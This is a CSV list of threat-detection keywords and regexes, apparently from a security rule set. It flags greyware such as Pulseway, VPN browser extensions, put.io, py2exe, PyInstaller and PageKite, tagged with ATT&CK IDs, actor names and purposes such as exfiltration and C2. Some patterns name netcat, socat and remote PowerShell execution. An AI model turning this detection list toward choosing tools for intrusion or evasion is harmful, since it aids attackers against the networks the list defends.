"*\Tasks\PulsewayServiceCheck*",".{0,1000}\\Tasks\\PulsewayServiceCheck.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Pulseway Remote Control</Data>*",".{0,1000}\<Data\>Pulseway\sRemote\sControl\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Received Request Execute automation * script * from device Id*",".{0,1000}\<Data\>Received\sRequest\sExecute\sautomation\s.{0,1000}\sscript\s.{0,1000}\sfrom\sdevice\sId.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Received Request Get RD pool score *pulseway.com/remote*",".{0,1000}\<Data\>Received\sRequest\sGet\sRD\spool\sscore\s.{0,1000}pulseway\.com\/remote.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name=""PC Monitor"" />*",".{0,1000}\<Provider\sName\=\""PC\sMonitor\""\s\/\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name=""Pulseway"" />*",".{0,1000}\<Provider\sName\=\""Pulseway\""\s\/\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.pulseway.com/app/main/*",".{0,1000}https\:\/\/.{0,1000}\.pulseway\.com\/app\/main\/.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Pulseway -- Installation completed successfully*",".{0,1000}Pulseway\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Pulseway -- Removal completed successfully*",".{0,1000}Pulseway\s\-\-\sRemoval\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Pulseway Remote Control -- Installation completed successfully*",".{0,1000}Pulseway\sRemote\sControl\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Pulseway Remote Control.lnk*",".{0,1000}Pulseway\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pulseway_x64.pkg.tar.xz*",".{0,1000}pulseway_x64\.pkg\.tar\.xz.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pwyrc-clip.exe*",".{0,1000}pwyrc\-clip\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-asia-au-1.pulseway.com*",".{0,1000}rd\-asia\-au\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-eu-de-1.pulseway.com*",".{0,1000}rd\-eu\-de\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-eu-ie-1.pulseway.com*",".{0,1000}rd\-eu\-ie\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-us-east-1.pulseway.com*",".{0,1000}rd\-us\-east\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-us-east-2.pulseway.com*",".{0,1000}rd\-us\-east\-2\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rd-us-west-1.pulseway.com*",".{0,1000}rd\-us\-west\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Received Request Run PowerShell command '*' from device Id*",".{0,1000}Received\sRequest\sRun\sPowerShell\scommand\s\'.{0,1000}\'\sfrom\sdevice\sId.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemoteDesktop.exe*pwy-rd:?token=*",".{0,1000}RemoteDesktop\.exe.{0,1000}pwy\-rd\:\?token\=.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SC  QUERYEX ""PC Monitor""*",".{0,1000}SC\s\sQUERYEX\s\""PC\sMonitor\"".{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*service pulseway start*",".{0,1000}service\spulseway\sstart.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*service pulseway stop*",".{0,1000}service\spulseway\sstop.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ServiceName"">Pulseway</Data>*",".{0,1000}ServiceName\""\>Pulseway\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*systemctl start pulseway*",".{0,1000}systemctl\sstart\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*systemctl status pulseway*",".{0,1000}systemctl\sstatus\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*systemctl stop pulseway*",".{0,1000}systemctl\sstop\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*systemprofile\AppData\Roaming\freerdp\server*",".{0,1000}systemprofile\\AppData\\Roaming\\freerdp\\server.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*www.pulseway.com/download/*",".{0,1000}www\.pulseway\.com\/download\/.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bfidboloedlamgdmenmlbipfnccokknp*",".{0,1000}bfidboloedlamgdmenmlbipfnccokknp.{0,1000}","greyware_tool_keyword","PureVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*eidnihaadmmancegllknfbliaijfmkgo*",".{0,1000}eidnihaadmmancegllknfbliaijfmkgo.{0,1000}","greyware_tool_keyword","Push VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://put.io/?login*",".{0,1000}https\:\/\/put\.io\/\?login.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.i","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://put.io/default/magnet?url=*",".{0,1000}https\:\/\/put\.io\/default\/magnet\?url\=.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","https://put.i","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://put.io/transfers*",".{0,1000}https\:\/\/put\.io\/transfers.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.i","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://put.io/v2/oauth2/register*",".{0,1000}https\:\/\/put\.io\/v2\/oauth2\/register.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.i","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* py2exe*",".{0,1000}\spy2exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*/py2exe/*",".{0,1000}\/py2exe\/.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*\py2exe*",".{0,1000}\\py2exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe *",".{0,1000}py2exe\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe*.exe *",".{0,1000}py2exe.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe*.msi *",".{0,1000}py2exe.{0,1000}\.msi\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe*.py*",".{0,1000}py2exe.{0,1000}\.py.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe-*.tar.gz*",".{0,1000}py2exe\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe-*.whl*",".{0,1000}py2exe\-.{0,1000}\.whl.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe.build_exe*",".{0,1000}py2exe\.build_exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe.freeze*",".{0,1000}py2exe\.freeze.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe.git*",".{0,1000}py2exe\.git.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe_setuptools.py*",".{0,1000}py2exe_setuptools\.py.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*py2exe-master.zip*",".{0,1000}py2exe\-master\.zip.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z"
"*/pyinstaller/*",".{0,1000}\/pyinstaller\/.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*import PyInstaller*",".{0,1000}import\sPyInstaller.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*install pyinstaller*",".{0,1000}install\spyinstaller.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*pyinstaller *.py*",".{0,1000}pyinstaller\s.{0,1000}\.py.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*pyinstaller* --onefile --add-data *",".{0,1000}pyinstaller.{0,1000}\s\-\-onefile\s\-\-add\-data\s.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*pyinstaller.exe*",".{0,1000}pyinstaller\.exe.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","1","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*pyinstaller/tarball*",".{0,1000}pyinstaller\/tarball.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*pyinstaller-script.py*",".{0,1000}pyinstaller\-script\.py.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","1","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* install xvnc4viewer netcat-traditional socat*",".{0,1000}\sinstall\sxvnc4viewer\snetcat\-traditional\ssocat.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"* pagekite.logging*",".{0,1000}\spagekite\.logging.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"* pagekite.py*",".{0,1000}\spagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"* pagekite-gtk.py*",".{0,1000}\spagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*""PageKite system service""*",".{0,1000}\""PageKite\ssystem\sservice\"".{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/etc/pagekite.d*",".{0,1000}\/etc\/pagekite\.d.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-*.log*",".{0,1000}\/pagekite\-.{0,1000}\.log.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite.log*",".{0,1000}\/pagekite\.log.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite.py*",".{0,1000}\/pagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-0.3.21.py*",".{0,1000}\/pagekite\-0\.3\.21\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-0.4.6a.py*",".{0,1000}\/pagekite\-0\.4\.6a\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-0.5.6d.py*",".{0,1000}\/pagekite\-0\.5\.6d\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
